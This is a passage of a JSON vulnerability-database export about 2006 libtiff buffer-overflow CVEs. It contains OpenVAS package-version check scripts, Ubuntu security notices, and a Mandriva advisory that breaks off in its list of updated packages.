"2012-09-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57306", "id": "OPENVAS:57306", "title": "Slackware Advisory SSA:2006-230-01 libtiff", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_230_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New libtiff packages are available for Slackware 9.0, 9.1, 10.0, 10.1,\n10.2, and -current to fix security issues. These issues could be used\nto crash programs linked to libtiff or possibly to execute code as the\nprogram's user.\n\nThanks to Tavis Ormandy and the Google Security Team.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2006-230-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-230-01\";\n \nif(description)\n{\n script_id(57306);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2006-3459\", \"CVE-2006-3460\", \"CVE-2006-3461\", \"CVE-2006-3462\", \"CVE-2006-3463\", \"CVE-2006-3464\", \"CVE-2006-3465\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2006-230-01 libtiff \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"libtiff\", ver:\"3.8.2-i386-1_slack9.0\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"libtiff\", ver:\"3.8.2-i486-1_slack9.1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"libtiff\", ver:\"3.8.2-i486-1_slack10.0\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"libtiff\", ver:\"3.8.2-i486-1_slack10.1\", rls:\"SLK10.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"libtiff\", ver:\"3.8.2-i486-1_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:58", "bulletinFamily": "scanner", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libtiff\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020045 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065521", "id": "OPENVAS:136141256231065521", "title": "SLES9: Security update for libtiff", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5020045.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for libtiff\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libtiff\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020045 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65521\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2006-3459\", \"CVE-2006-3460\", \"CVE-2006-3461\", \"CVE-2006-3462\", \"CVE-2006-3463\", \"CVE-2006-3464\", \"CVE-2006-3465\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"SLES9: Security update for libtiff\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libtiff\", rpm:\"libtiff~3.6.1~38.33\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:47", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200608-07.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57857", "id": "OPENVAS:57857", "title": "Gentoo Security Advisory GLSA 200608-07 (tiff)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"libTIFF contains several vulnerabilities that could result in arbitrary\ncode execution.\";\ntag_solution = \"All libTIFF users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/tiff-3.8.2-r2'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200608-07\nhttp://bugs.gentoo.org/show_bug.cgi?id=142383\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200608-07.\";\n\n \n\nif(description)\n{\n script_id(57857);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-3459\", \"CVE-2006-3460\", \"CVE-2006-3461\", \"CVE-2006-3462\", \"CVE-2006-3463\", \"CVE-2006-3464\", \"CVE-2006-3465\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200608-07 (tiff)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-libs/tiff\", unaffected: make_list(\"ge 3.8.2-r2\"), vulnerable: make_list(\"lt 3.8.2-r2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:56:07", "bulletinFamily": "scanner", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libtiff\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020045 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=65521", "id": "OPENVAS:65521", "title": "SLES9: Security update for libtiff", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5020045.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for libtiff\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libtiff\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5020045 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65521);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2006-3459\", \"CVE-2006-3460\", \"CVE-2006-3461\", \"CVE-2006-3462\", \"CVE-2006-3463\", \"CVE-2006-3464\", \"CVE-2006-3465\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"SLES9: Security update for libtiff\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libtiff\", rpm:\"libtiff~3.6.1~38.33\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:45", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200607-03.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57119", "id": "OPENVAS:57119", "title": "Gentoo Security Advisory GLSA 200607-03 (tiff)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"libTIFF contains buffer overflows that could result in arbitrary code\nexecution.\";\ntag_solution = \"All libTIFF users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/tiff-3.8.2-r1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200607-03\nhttp://bugs.gentoo.org/show_bug.cgi?id=135881\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200607-03.\";\n\n \n\nif(description)\n{\n script_id(57119);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-2193\", \"CVE-2006-2656\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200607-03 (tiff)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-libs/tiff\", unaffected: make_list(\"ge 3.8.2-r1\"), vulnerable: make_list(\"lt 3.8.2-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:11", "bulletinFamily": "scanner", "description": "The remote host is missing an update to tiff\nannounced via advisory DSA 1091-1.\n\nSeveral problems have been discovered in the TIFF library. The Common\nVulnerabilities and Exposures project identifies the following issues:\n\nCVE-2006-2193\n\nSuSE discovered a buffer overflow in the conversion of TIFF files\ninto PDF documents which could be exploited when tiff2pdf is used\ne.g. in a printer filter.\n\nCVE-2006-2656\n\nThe tiffsplit command from the TIFF library contains a buffer\noverflow in the commandline handling which could be exploited when\nthe program is executed automatically on unknown filenames.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 3.5.5-7woody2.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=56923", "id": "OPENVAS:56923", "title": "Debian Security Advisory DSA 1091-1 (tiff)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1091_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1091-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in\nversion 3.7.2-5.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 3.8.2-4.\n\nWe recommend that you upgrade your tiff packages.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201091-1\";\ntag_summary = \"The remote host is missing an update to tiff\nannounced via advisory DSA 1091-1.\n\nSeveral problems have been discovered in the TIFF library. The Common\nVulnerabilities and Exposures project identifies the following issues:\n\nCVE-2006-2193\n\nSuSE discovered a buffer overflow in the conversion of TIFF files\ninto PDF documents which could be exploited when tiff2pdf is used\ne.g. in a printer filter.\n\nCVE-2006-2656\n\nThe tiffsplit command from the TIFF library contains a buffer\noverflow in the commandline handling which could be exploited when\nthe program is executed automatically on unknown filenames.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 3.5.5-7woody2.\";\n\n\nif(description)\n{\n script_id(56923);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:09:45 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-2656\", \"CVE-2006-2193\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1091-1 (tiff)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libtiff-tools\", ver:\"3.5.5-7woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff3g\", ver:\"3.5.5-7woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff3g-dev\", ver:\"3.5.5-7woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff-opengl\", ver:\"3.7.2-5\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff-tools\", ver:\"3.7.2-5\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff4\", ver:\"3.7.2-5\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff4-dev\", ver:\"3.7.2-5\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiffxx0\", ver:\"3.7.2-5\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2019-05-29T17:21:12", "bulletinFamily": "unix", "description": "Tavis Ormandy discovered that the TIFF library did not sufficiently check handled images for validity. By tricking an user or an automated system into processing a specially crafted TIFF image, an attacker could exploit these weaknesses to execute arbitrary code with the target application\u2019s privileges.\n\nThis library is used in many client and server applications, thus you should reboot your computer after the upgrade to ensure that all running programs use the new version of the library.", "modified": "2006-08-03T00:00:00", "published": "2006-08-03T00:00:00", "id": "USN-330-1", "href": "https://usn.ubuntu.com/330-1/", "title": "tiff vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T17:21:09", "bulletinFamily": "unix", "description": "A buffer overflow has been found in the tiff2pdf utility. By tricking an user into processing a specially crafted TIF file with tiff2pdf, this could potentially be exploited to execute arbitrary code with the privileges of the user. (CVE-2006-2193)\n\nA. Alejandro Hern\ufffdndez discovered a buffer overflow in the tiffsplit utility. By calling tiffsplit with specially crafted long arguments, an user can execute arbitrary code. If tiffsplit is used in e. g. a web-based frontend or similar automated system, this could lead to remote arbitary code execution with the privileges of that system. (In normal interactive command line usage this is not a vulnerability.) (CVE-2006-2656)", "modified": "2006-06-08T00:00:00", "published": "2006-06-08T00:00:00", "id": "USN-289-1", "href": "https://usn.ubuntu.com/289-1/", "title": "tiff vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n \r\n Mandriva Linux Security Advisory MDKSA-2006:137\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n \r\n Package : libtiff\r\n Date : August 1, 2006\r\n Affected: 2006.0, Corporate 3.0, Multi Network Firewall 2.0\r\n _______________________________________________________________________\r\n \r\n Problem Description:\r\n \r\n Tavis Ormandy, Google Security Team, discovered several vulnerabilites\r\n the libtiff image processing library:\r\n \r\n Several buffer overflows have been discovered, including a stack\r\n buffer overflow via TIFFFetchShortPair() in tif_dirread.c, which is\r\n used to read two unsigned shorts from the input file. While a bounds\r\n check is performed via CheckDirCount(), no action is taken on the\r\n result allowing a pathological tdir_count to read an arbitrary number\r\n of unsigned shorts onto a stack buffer. (CVE-2006-3459) \r\n \r\n A heap overflow vulnerability was discovered in the jpeg decoder,\r\n where TIFFScanLineSize() is documented to return the size in bytes\r\n that a subsequent call to TIFFReadScanline() would write, however the\r\n encoded jpeg stream may disagree with these results and overrun the\r\n buffer with more data than expected. (CVE-2006-3460)\r\n \r\n Another heap overflow exists in the PixarLog decoder where a run\r\n length encoded data stream may specify a stride that is not an exact\r\n multiple of the number of samples. The result is that on the final\r\n decode operation the destination buffer is overrun, potentially\r\n allowing an attacker to execute arbitrary code. (CVE-2006-3461)\r\n \r\n The NeXT RLE decoder was also vulnerable to a heap overflow\r\n vulnerability, where no bounds checking was performed on the result of\r\n certain RLE decoding operations. This was solved by ensuring the\r\n number of pixels written did not exceed the size of the scanline\r\n buffer already prepared. (CVE-2006-3462)\r\n \r\n An infinite loop was discovered in EstimateStripByteCounts(), where a\r\n 16bit unsigned short was used to iterate over a 32bit unsigned value,\r\n should the unsigned int (td_nstrips) have exceeded USHORT_MAX, the\r\n loop would never terminate and continue forever. (CVE-2006-3463)\r\n \r\n Multiple unchecked arithmetic operations were uncovered, including a\r\n number of the range checking operations deisgned to ensure the offsets\r\n specified in tiff directories are legitimate. These can be caused to\r\n wrap for extreme values, bypassing sanity checks. Additionally, a\r\n number of codepaths were uncovered where assertions did not hold true,\r\n resulting in the client application calling abort(). (CVE-2006-3464)\r\n \r\n A flaw was also uncovered in libtiffs custom tag support, as\r\n documented here http://www.libtiff.org/v3.6.0.html. While well formed\r\n tiff files must have correctly ordered directories, libtiff attempts\r\n to support broken images that do not. However in certain\r\n circumstances, creating anonymous fields prior to merging field\r\n information from codec information can result in recognised fields\r\n with unexpected values. This state results in abnormal behaviour,\r\n crashes, or potentially arbitrary code execution. (CVE-2006-3465)\r\n \r\n The updated packages have been patched to correct these issues.\r\n _______________________________________________________________________\r\n\r\n References:\r\n \r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3459\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3460\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3461\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3462\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3463\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3464\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3465\r\n _______________________________________________________________________\r\n \r\n Updated Packages:\r\n \r\n Mandriva Linux 2006.0:\r\n c0173eb2f2d497fce68b863a6d01433e 2006.0/RPMS/libtiff3-3.6.1-12.6.20060mdk.i586.rpm\r\n 55369714ae92ea654507f33944285322 2006.0/RPMS/libtiff3-devel-3.6.1-12.6.20060mdk.i586.rpm\r\n 8303a2a5f5b98d0fe984c4f62a8849e7 2006.0/RPMS/libtiff3-static-devel-3.6.1-12.6.20060mdk.i586.rpm\r\n 898dbc11589b623cba53d4e0dea4ec6e 2006.0/RPMS/libtiff-progs-3.6.1-12.6.20060mdk.i586.rpm\r\n 1f77f216c421961825035b17e2fc3d0f 2006.0/SRPMS/libtiff-3.6.1-12.6.20060mdk.src.rpm\r\n\r\n Mandriva Linux 2006.0/X86_64:\r\n 67217a6617c35cfa110b9199ce827c7f x86_64/2006.0/RPMS/lib64tiff3-3.6.1-12.6.20060mdk.x86_64.rpm\r\n b5ea6efd7fcb1db40c69457de4d90980 